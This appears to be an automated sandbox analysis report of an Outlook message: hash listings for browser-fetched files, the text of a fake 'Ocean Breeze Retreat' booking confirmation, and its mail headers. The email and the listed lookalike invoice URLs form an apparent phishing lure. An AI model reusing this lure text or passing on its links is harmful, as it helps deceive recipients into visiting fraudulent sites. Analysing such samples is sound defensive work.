                                                                                                                          MD5:CE8307E3E9637A93F5522084BFC6D976
                                                                                                                          SHA1:88640B50D51DB364EA7803EE29CB2D984EDDA95D
                                                                                                                          SHA-256:8E41CA607FA77B9A0A7B86CC6EA1B57EDA1A2B99530AE2E3A54D0C8913A2A532
                                                                                                                          SHA-512:116C28604CAB737BFFD510752E4CF0BA80F1B183C7D13F1CE030EDDAB7C705F1306DA64C4C031A3BCB7B79FE2BEACC1C812ED2841F3C5EB231C56E17DA878474
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):111
                                                                                                                          Entropy (8bit):5.474797290538805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:3DA8489754D089433FC8490366902087
                                                                                                                          SHA1:1110AA3B68B53B3FF0AF4E248FFEDF852E36C465
                                                                                                                          SHA-256:4C8616504020FBE8DEA4DCA06172F7D475D7A2B542C8958185DC5B9103B11376
                                                                                                                          SHA-512:6AF0024D4F49D25C31B8DAA74CC8DC077E3E673347AAD7C98FA6262741D8416B5FFAFFF44D6939F3F9B6E633F0139BA7EFC20B3D7FCE3A443D1CC6C2BBFBD6AE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:(./..X.....{. "Windows": 340,Android3iOS": 57Mac": 12Linux": 11TotalDownloads": 552.}..F .d.3..d..7L&....I..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15
                                                                                                                          Entropy (8bit):3.189898095464287
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                                          SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                                          SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                                          SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                          Preview:/* empty css */
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2412)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):172367
                                                                                                                          Entropy (8bit):5.555151369878942
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F127A30F593CB96090AF164F4DD04E94
                                                                                                                          SHA1:8E45FAD5740967D50101E413F98F646D424E9385
                                                                                                                          SHA-256:6BE436287AF7A70143564DB4F2FFDCE5DED1241FFE85BF210E4495F873C63A33
                                                                                                                          SHA-512:D1A5DD175ABE8C4C7EC5C9E534E5C4B30A6F954F290ED05001FDDE5A6A92CF398604180BD1CCFB856A7C81B08C19F841624E4AECA7AB135B0C404C03E84989FC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt0d-Ss5kisT1M_8rsOzCdvCZrVWg"
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):4054
                                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1967)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):144887
                                                                                                                          Entropy (8bit):5.53496954552339
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6D008330D8EEC16EDFB3FF978426DADB
                                                                                                                          SHA1:E3EAF851BE396B25E5652F7FBE781662E36B738D
                                                                                                                          SHA-256:3C3EC268C6247472DEF435C267DBFAE46E8AA0C644FDDEA520AA6C77C7939C3A
                                                                                                                          SHA-512:077C3975010D353A80E859E67355F449E5B39E89836F95840F1C8E0598B79AEBBFCE5B2FE6F0C4AE916D093580CDC453E9C4673078397D4AE7456A2BA44595D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (41651)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):131537
                                                                                                                          Entropy (8bit):5.2237799798561975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                                          SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                                          SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                                          SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):945
                                                                                                                          Entropy (8bit):5.245381851025391
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:57598FD5AD33E49259C0E62B42342246
                                                                                                                          SHA1:7627B00CF6DE90157BE1F8F3CCCEA51937EB2B2D
                                                                                                                          SHA-256:223FFDACF2BC57A6AE1F197B8B17BB6CABBED1A70F9886DAFB78DE3C6D1167DF
                                                                                                                          SHA-512:3DAAA07CC66729AC0FFC32EEA852E49655B4A14709AF67AFC2C019448339CD0F9205918B2A9E904D35AF32BFA86B13B97A60D370759C2DE759ED834066FBD44C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://api.aws.parking.godaddy.com/v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true
                                                                                                                          Preview:{"system":"SN","account":"D6343586-FD7C-427C-8D3E-A35B29566ED2 ","customerId":"7dbc6047-87b6-4724-9c84-1e076f5b7c3d","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-oo-1502969727449347","channel":"00001","pubId":"dp-namemedia01"},"domain":{"rootDomain":"oceanbreeze.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"oceanbreeze.com","headerText":" ","footerText":" ","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"Click here to Buy oceanbreeze.com as your website name or call 1-561-898-0724","link":"http://www.afternic.com/forsale/oceanbreeze.com?utm_source=TDFS\u0026utm_medium=parkedpages\u0026utm_campaign=TDFS_Affiliate_namefind_Narwhal\u0026traffic_type=TDFS\u0026traffic_id=Namefind","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"","start":"","end":"","enabled":false}}.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1660
                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (32089)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):92629
                                                                                                                          Entropy (8bit):5.303443527492463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                                          SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                                          SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                                          SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1979)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1984
                                                                                                                          Entropy (8bit):5.836450657685294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:14D2717F55B8EDAE524B5217948D4D37
                                                                                                                          SHA1:E5580443FE0CF4332406078FD68C2300D6039482
                                                                                                                          SHA-256:C2D845B482274BDD874BFF1CA168C296BCA13F902917395C4C5D367AE07C77CA
                                                                                                                          SHA-512:4C3B849F830B6A153C6ECD2038BA732BC87E1B613CFFBAD66A57F81E7E4579C43C0938518EFD571C03D3EF53685FC39FF7D0CC0863BAF5DF28FE69AC0510DDC6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):563851
                                                                                                                          Entropy (8bit):5.221453271093944
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                                          SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                                          SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                                          SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                                          Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5162
                                                                                                                          Entropy (8bit):5.349865760247148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                          SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                                                          SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                          SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuS2lB4IRlJuMaoM0QgSoTOihj9Bg"
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):384
                                                                                                                          Entropy (8bit):5.471730780745167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BC590DBC9A19941C44F2437EFE954ACC
                                                                                                                          SHA1:1A31B3DE48B09AF7D51AF9D369841601902F7F0E
                                                                                                                          SHA-256:0E0F1F2F02002201D917B65025C03C612FF8CB626F9FD2AC6E78FC285D8A08EC
                                                                                                                          SHA-512:52C1F11C27EB9FAD4E91E11C1BBD00E978216E7671D4D399281F839544F79E4683E88512326CA16148883EAE9305FE1BE7A27203495076076B0B489C25BEBFC4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://partner.googleadservices.com/gampad/cookie.js?domain=oceanbreeze.com&client=dp-namemedia01&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
                                                                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=0d54330c01ce704f:T=1741386834:RT=1741386834:S=ALNI_MZlEZO3Gas6spuiH2r9-oSEn0MtQw","_expires_":1775082834,"_path_":"/","_domain_":"oceanbreeze.com","_version_":1},{"_value_":"UID=0000105732a04b29:T=1741386834:RT=1741386834:S=ALNI_MaunqWfJBzz1QCyQimH2dPGL2uErw","_expires_":1775082834,"_path_":"/","_domain_":"oceanbreeze.com","_version_":2}]});
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2956
                                                                                                                          Entropy (8bit):7.9246686840884815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:10B942DDCB35BC63D8055636B4201CE3
                                                                                                                          SHA1:F9B17FFAF800855F6E34E1E10421A08EB5777E29
                                                                                                                          SHA-256:D6FD69649D7069CC994E17CDB456024D72DF4A51F6402B60A534F7C1CA38591C
                                                                                                                          SHA-512:080DA6C67A3E807189B7F729E6E978F57A7AFE708D2E1FA994C50EAC8DE458238122AE9CD3E338A9D5212043F4BAC3667E7604AC900C9F6878255EEDD5F716B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookingmanageview.com/lnvoice/B-37288321/
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):167730
                                                                                                                          Entropy (8bit):5.045981547409661
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                                                                          SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                                                                          SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                                                                          SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):19
                                                                                                                          Entropy (8bit):3.6818808028034042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9FAE2B6737B98261777262B14B586F28
                                                                                                                          SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                                                                                          SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                                                                                          SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                          Preview:)]}'.{"ddljson":{}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):546
                                                                                                                          Entropy (8bit):7.5392268962803115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:02C3F7E389BD989273538638C0A4FF35
                                                                                                                          SHA1:7A80D4BF6447F3C7FCFA189312E3953B95EBE0BB
                                                                                                                          SHA-256:CC7F0FFDF0D7166E927D7DB34332FD76C8EAC9F4AD51104A52D89AB5AE06AAF5
                                                                                                                          SHA-512:1956BF79DC824D8E8C14224CCA2B32F01E43B15461D7BE5A063C26F7AA22B21B65C19C8F84C08DD3A1457B78D7C306CCF360D370AA117B69966EC2634939772B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookinginvoiceview.com/
                                                                                                                          File type:CDFV2 Microsoft Outlook Message
                                                                                                                          Entropy (8bit):4.163055452994072
                                                                                                                          TrID:
                                                                                                                          • Outlook Message (71009/1) 45.36%
                                                                                                                          • Outlook Form Template (41509/1) 26.51%
                                                                                                                          • ClickyMouse macro set (36024/1) 23.01%
                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 5.12%
                                                                                                                          File name:Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
                                                                                                                          File size:118'272 bytes
                                                                                                                          MD5:3a01d6a3cf44ee40632cdb0b40c36624
                                                                                                                          SHA1:13993d0144d3136e7ad9082e65450db0e1c12f03
                                                                                                                          SHA256:3bbc9f13f9ed9195ed633f8fa78be3ccc3336934ba79954a31cca0daba6b4158
                                                                                                                          SHA512:81637c438ced5db603516945f11a65f2110cc50ca576c55653305eaa88e44b644a9cb8b3017067e3a12d99b419c1312c2f60bf84c12d1ccbfdc688525f5523a0
                                                                                                                          SSDEEP:1536:W6AxLqUpp9taQkhMLslOgRnrlWZZWCtI/oW+7D1:ZjUppbrkhMLslOgRnrMtI4H1
                                                                                                                          TLSH:8CC312283AE60119F377DF358BF2509B8926FD536D149A5F2195330D0A72A41ACA2F3F
                                                                                                                          Subject:Dear, david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat
                                                                                                                          From:"Ocean Breeze" <support@w-d7f249u2qdtv96vtgmgtwp7r8y22vk78h3ic66fai8z8a57es.hn-3cawemao.na231.case.salesforce.com>
                                                                                                                          To:<david@corerecon.com>
                                                                                                                          Cc:
                                                                                                                          BCC:
                                                                                                                          Date:Fri, 07 Mar 2025 23:04:42 +0100
                                                                                                                          Communications:
• david@corerecon.com <https://cl.s12.exct.net/open.aspx?ffcb10-fefe1072716106-fe8b1779716d0c7f74-fe3511737164057b741773-ff6117727c-fe8d16777363067a76-ff3c15707566&d=120027&bmt=0>
  To view this email as a web page, go here. <https://view.s12.exacttarget.com/?qs=44dafead476a1871e9f31d7a8df77b355359621e30d614843b0357fede10ce355ea3775573b5c79cee8168c942cedf53b9c5f0d7996ce92ce11c3a64184670912e5465d149ffe9761001de0de1d7978e>
  Your Stay Has Been Successfully Booked
  Welcome to Ocean Breeze Retreat
  Dear david@corerecon.com,
  We are pleased to confirm your reservation at Ocean Breeze Retreat. Below are your booking details:
  Reservation Details
  Here are the details of your upcoming stay:
  Check-in Date: April 10, 2025
  Check-out Date: April 15, 2025
  Room Type: Premium Oceanview Suite
  Guests: 2 Adults
  Total Amount: 2,648.00$
  Manage Your Reservation <https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547>
  Important Information
  * Check-in: 3:00 PM | Check-out: 11:00 AM
  * Free cancellation available until April 7, 2025
  * Complimentary access to the private beach & spa
  * Contact us for any special requests
  For assistance, contact us at support@oceanbreeze.com
  Ocean Breeze Retreat, 725 Coastal Drive, Santa Monica, CA 90401, USA
  Phone: (877) 468-9723
  This email was sent to: david@corerecon.com
  This email was sent by: Bthrice 1240 S Corning St Los Angeles, CA null US
  We respect your right to privacy - view our policy <https://cl.s12.exct.net/?qs=dd02f46a2b01ff14dc5b7da9efafacd0d43e00a253b781cd62717532a53336f4a17deb78daec73fc73f237543d44a48e1e41ba258457ec6d>
  <https://www.exacttarget.com/images/Powered_By_1206.jpg>
  Manage Subscriptions <https://cl.S12.exct.net/subscription_center.aspx?qs=963b645280b3b2cd6b4ca45389a44a0d3096c4c34d6df6dbae44361b74a1e7ebf9a71db37e16672b3aea865908e84f52d4737e9228bd253b5a11c86b809c5bf1> | Update Profile <https://cl.S12.exct.net/profile_center.aspx?qs=963b645280b3b2cd2143912c2729c2aa880af1d0fcd2da980b66ac4d050ddd23d9622d7abebee190874f3df766895ed49841a543fdf9040dbe23394f02a4ceb6> | Unsubscribe <https://cl.S12.exct.net/unsub_center.aspx?qs=963b645280b3b2cd6b4ca45389a44a0d3096c4c34d6df6dbae44361b74a1e7eb9e6c9537d8482f185ddf72405d4781ff994693b45fe39c9f3cc73f3ace7da3448e24950e880c80ba>
                                                                                                                          Attachments:
Key: Value
Received: by lw7.mta.exacttarget.com id hpdmnm2fmd40 for <david@corerecon.com>; Fri, 7 Mar 2025 22:04:42 +0000 (envelope-from <bounce-329_HTML-2767273-42452-534016133-1002@bounce.s12.exacttarget.com>)
22:04:48 +0000
by PH7PR11MB5796.namprd11.prod.outlook.com (2603:10b6:510:13b::13) with
2025 22:04:43 +0000
(2603:10b6:a03:39f::15) with Microsoft SMTP Server (version=TLS1_3,
7 Mar 2025 22:04:43 +0000
Authentication-Results: spf=pass (sender IP is 13.110.209.7)
Received-SPF: Pass (protection.outlook.com: domain of
15.20.8511.15 via Frontend Transport; Fri, 7 Mar 2025 22:04:43 +0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=fbldkim12; d=s12.y.mc.salesforce.com;
h=From:To:Subject:Date:List-Unsubscribe:MIME-Version:Message-ID:Content-Type;
Message-ID:Content-Type;
From: "Ocean Breeze" <support@w-d7f249u2qdtv96vtgmgtwp7r8y22vk78h3ic66fai8z8a57es.hn-3cawemao.na231.case.salesforce.com>
To: <david@corerecon.com>
Subject: =?UTF-8?B?RGVhciwgZGF2aWRAY29yZXJlY29uLmNvbSAtIFlvdXIgU3RheSBI?=
Date: Fri, 07 Mar 2025 16:04:42 -0600
List-Unsubscribe: <https://cl.S12.exct.net/subscription_center.aspx?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJtaWQiOiI1MzQwMTYxMzMiLCJzIjoiMjc2NzI3MyIsImxpZCI6IjMyOSIsImoiOiI0MjQ1MiIsImpiIjoiMTAwMiIsImQiOiIxMjAwMjcifQ.JoxMxFVmbw_xrLNOtnIiV4v2x5hnFu0NAsS16Z5H74I>, <mailto:leave-fd4d17727c0b5c392848-fe8d16777363067a76-fefe1072716106-fe3511737164057b741773-ff3c15707566@leave.s12.exacttarget.com>
List-Unsubscribe-Post: List-Unsubscribe=One-Click
MIME-Version: 1.0
X-SFMC-Stack: 12
x-job: 534016133_42452
Message-ID: <04ad5994-fb3f-412b-8faf-40aa3acd2c3c@iad4s12mta1145.xt.local>
Content-Type: multipart/alternative;
boundary="hLN7BLacvDGC=_?"
Return-Path: bounce-329_HTML-2767273-42452-534016133-1002@bounce.s12.exacttarget.com
X-MS-Exchange-Organization-ExpirationStartTime: 07 Mar 2025 22:04:43.4943
X-MS-Exchange-Organization-ExpirationStartTimeReason: OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval: 1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason: OriginalSubmit
X-MS-Exchange-Organization-Network-Message-Id: ffd05e59-a730-4d16-bd90-08dd5dc410e5
X-EOPAttributedMessage: 0
X-EOPTenantAttributedMessage: fd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d:0
X-MS-Exchange-Organization-MessageDirectionality: Incoming
X-MS-PublicTrafficType: Email
X-MS-TrafficTypeDiagnostic: BY1PEPF0001AE18:EE_|PH7PR11MB5796:EE_|PH8PR11MB6611:EE_
X-MS-Exchange-Organization-AuthSource: BY1PEPF0001AE18.namprd04.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Office365-Filtering-Correlation-Id: ffd05e59-a730-4d16-bd90-08dd5dc410e5
X-MS-Exchange-Organization-SCL: 1
X-Microsoft-Antispam: BCL:0;ARA:13230040|4022899009|69100299015|5073199012|4076899003|8096899003|13003099007|7053199007|51400299038;
X-Forefront-Antispam-Report: CIP:13.110.209.7;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:lw7.mta.exacttarget.com;PTR:lw7.mta.exacttarget.com;CAT:NONE;SFS:(13230040)(4022899009)(69100299015)(5073199012)(4076899003)(8096899003)(13003099007)(7053199007)(51400299038);DIR:INB;
X-MS-Exchange-CrossTenant-OriginalArrivalTime: 07 Mar 2025 22:04:43.2911
